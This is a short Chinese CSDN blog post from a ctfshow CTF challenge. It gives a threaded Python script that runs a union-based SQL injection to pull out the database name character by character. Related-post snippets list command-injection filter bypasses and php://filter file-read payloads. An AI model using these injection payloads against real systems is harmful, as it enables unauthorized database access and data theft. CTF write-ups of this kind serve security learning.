Ctfshow python for test mysql

最新推荐文章于 2022-07-19 02:38:02 发布
最新推荐文章于 2022-07-19 02:38:02 发布
阅读量88 收藏
点赞数 1
分类专栏: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45427131/article/details/117638193
版权
该篇博客展示了如何利用Python的requests库进行SQL注入攻击,尝试猜测数据库名。通过构造特定的URL,结合ASCII码进行遍历来解码数据库名的一部分。作者使用了多线程来加速这个过程,并提到后续会有更多解题方法分享。
摘要由CSDN通过智能技术生成 
import threading
import requests
url1 = "http://fe9bdd81-5686-4588-a6b2-37f03fda52f3.challenge.ctf.show:8080/index.php?id=1'/**/union/**/select/**/1,"

def dataname(url):
    c=''
    for j in range(1,5):  
        for i in range(35,127):
            ur=url+"ascii(substr(database(),"+str(j)+",1))="+str(i)+",3/**/#"
            req = requests.get(ur)
            # print (req.text)
            if "<h4>1" in req.text:
                c+=chr(i)
                print (chr(i))
                break
            else:
                pass
    print (c)

t=threading.Thread(target=dataname,args=(url1,))
t.start()

测试数据库库名,后续会放出另外的解题方法,水篇文章

chin”
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VCForPython27和windows 系统下python 2.7 的mysql驱动
07-26
"VCForPython27"是Microsoft为Python 2.7提供的Visual C++运行库,它是安装某些Python扩展模块,如MySQL驱动(通常称为`pymysql`或`MySQLdb`)所必需的,因为这些模块可能依赖于C编译的库。`VCForPython27`解决了...
[CTFSHOW][反序列化]web277、web278:python反序列化漏洞
weixin_53958123的博客
06-03 831
当时没有公网IP的服务器,就测试了能不能利用无回显sleep盲打脚本来弹出flag。先测试了以下sleep 5命令执行成功。用之前盲打脚本改了一下:
ctfshow 常用姿势 801-827
blowed的博客
06-04 1880
主要是脚本 做法 基本上没原理
ctfshow(刷题经历)
qq_62046696的博客
06-26 1674
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
ctfshow-红包题第一弹(python脚本读取zip文件并提取内容)
qq_44657899的博客
08-14 953
解压后得到以下文件: 压缩包里面有一张图片,发现每张图片最后都有一段base64, 然后尝试全部提取出来,因为文件比较多所以只能用脚本了,我写的简易脚本如下: import zipfile for i in range(1, 87): # 读取压缩包 z = zipfile.ZipFile('D:\desktop/flag/' + str(i)+'.zip', 'r') # 读取压缩包内的图片内容 filename = z.namelist()[0]
MySQL for Python
11-30
MySQL for Python--Integrate the flexibility of Python and the power of MySQL to boost the productivity of your applications
python自动备份mysql数据库,并删除七天前文件
09-27
本示例涉及的主题是使用Python来自动备份MySQL数据库,并且定期清理过期的备份文件,以保持存储空间的有效利用。下面将详细介绍这个过程以及相关的知识点。 首先,我们需要了解Python在数据库操作中的角色。Python...
python 操作数据库 mysql oracle
09-26
python 操作数据库 mysql oracle cx_oracle to_sql 操作数据库 读取 插入 更新
python 连接mysql通用模块
最新发布
03-25
Python连接MySQL的通用模块主要指的是Python中的`pymysql`或`mysql-connector-python`库,它们提供了在Python中操作MySQL数据库的能力。本篇将详细阐述如何使用这些模块进行数据库的增、删、改、查操作。 首先,...
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 2643
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
Ctfshow web入门-web32
qq_45427131的博客
05-13 1644
Ctfshow web入门-web32 WP 拿到url,首先查看源码 过滤了以下字符串 flag|system|php|cat|sort|shell|.| |’|`|echo|;|( 过滤了空格可以用${IFS}和%0a 代替,分号可以用?>代替 但是过滤了括号之后就不能用带有括号的函数,php中include是可以不带括号的函数,和web31一样,这里需要用文件包含 所以构造的Payload是 payload:http://url/?c=include%0a$_POST[1]?>
Ctfshow web入门-web79-web81 WP
qq_45427131的博客
05-23 1333
web79 查看源码发现没有过滤,直接php伪协议包含 知识点——php伪协议 ,伪协议有很多,文件包含可以用php://filter payload: ?file=php://filter/read=convert.base64-encode/resource=需要包含的文件 执行,获取到base64加密之后的字符串然后解码 web80 查看代码,发现str_replace过滤了php,这个可以用大小写绕过,但是这里不推荐,因为能data命令执行 知识点——data命令执行: data:text/
Ctfshow web入门-web42
qq_45427131的博客
05-18 1247
web42 检查代码,发现代码似乎很简单?只需要输入命令执行,但是实际执行之后的小伙伴会发现如果只是输一个指令,回显都是空白,原因很简单。 在给变量c赋值的语句下面的语句”>/dev/null 2>&1“ ,可以将其理解成将输入的数写入黑洞 2>/dev/null 意思就是把错误输出到“黑洞” >/dev/null 2>&1 默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出2
Ctfshow web入门-php特性-web89-91 WP
qq_45427131的博客
05-25 1059
web89 查看代码 preg_match过滤0-9,即发现有0-9,就输出no no no 然而intval函数的作用是返回变量的整数值,两者相互矛盾 这里可以通过数组绕过,构造payload: ?num[]= 成功获取flag web90 查看源码,第一个if是验证num是否被设置,第二个if验证num是否是4476,如果是,就输出no no no ,第三个if验证num取整后是否等于4476 看到取整,还不好做吗~,直接输入小数取整绕过第二个if的验证 payload?num=4476.1
CTF萌新日记——绕过
qq_45427131的博客
07-19 1025
CTF萌新日记——绕过
Ctfshow web入门-web30 WP
qq_45427131的博客
05-13 994
拿到url首先查看源码,发现源码对比上一题只是多了个对输入值system的过滤 preg_match函数过滤system函数,但是php中执行方法的函数有很多,比如passthru、exec,shell_exec等 ,注意exec对执行的结果不输出 passthru和system的作用是一样的,解题的姿势有很多,本文简述几种解题方式 解法一: 这里用exec执行函数,虽然exec对执行结果不输出,但是不代表不可以查看flag,这里用函数执行复制(将flag复制给1.txt,直接用浏览器访问1.txt),
CTFshow web-web3 WP
qq_45427131的博客
05-11 675
CTFshow Web-Web3 文件包含+命令执行(伪协议) Php://filter/read=convert.base64-encode/resource=文件名 用php伪协议读取经过base64加密之后的文件 php://input php://input可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。 注:当enctype=”multipa
Ctfshow web-web2 WP
qq_45427131的博客
05-10 614
Ctfshow-Web-Web2 WP Ctfshow Web2 手工 1、 尝试万能密码 然后尝试查看显示位 查看当前连接的数据库 查询当前数据库下面的表面名 接下来查询字段名 最后查询flag 上面是手工爆破,要点是查询数据库内的表名和数据库内的字段名 查询数据库内所有表名的语句: select table_name from information_schema.tables where table_schema=“你想查找的数据库名” 查询表中所有字段的语句: select column
Ctfshow web入门-web33
qq_45427131的博客
05-13 531
Ctfshow web入门-web33 WP 拿到url首先分析代码,发现preg_match函数的过滤条件又多了两个 /flag|system|php|cat|sort|shell|.| |’|`|echo|;|(|" 因为这题和web32一样,过滤了括号,所以有括号的函数肯定是不能用了,只能尝试文件包含,用include函数, payload: http://url/?c=eval($_POST[a])?> 配合POST提交a的数据 文件包含成功,用php伪协议查看flag 拿到base6
PythonMySQL整合实战
"MySQL for Python" 本书《Packt MySQL for Python》是针对Python开发者的一本指南,旨在帮助读者理解和掌握如何将Python与强大的MySQL数据库系统整合,以提升应用程序的效率和生产力。作者Albert Lukaszewski是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值